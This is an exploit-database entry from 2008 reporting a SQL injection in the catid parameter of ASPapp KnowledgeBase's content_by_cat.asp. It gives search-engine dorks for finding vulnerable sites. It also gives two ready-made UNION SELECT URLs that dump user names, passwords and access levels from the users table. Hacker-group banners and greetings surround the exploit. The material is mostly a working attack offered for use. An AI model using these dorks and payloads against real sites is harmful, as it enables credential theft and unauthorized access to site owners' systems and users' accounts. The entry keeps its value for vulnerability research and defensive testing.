ASPapp Knowledge Base - SQL Injection

EDB-ID:

5286


Author:

xcorpitx

Type:

webapps


Platform:

ASP

Date:

2008-03-20


..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##

-------------------------Turkey------------------------------
                                               
-----------------www.Hayalet-hack.com------------------------

-----------------www.xcorpitx-hack.com-----------------------

ASPapp KnowledgeBase (content_by_cat.asp?catid) SQL Injection Vulnerability 
-------------------------------------------------------------

-------
Dork 1 -  content_by_cat.asp?contentid ''catid'' 

Dork 2 -  content_by_cat.asp? ''catid''  
-------
exploit-
-------

-------------------------------------------------------------
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
-------------------------------------------------------------

-------------------------------------------------------------
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
-------------------------------------------------------------

thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-

# milw0rm.com [2008-03-20]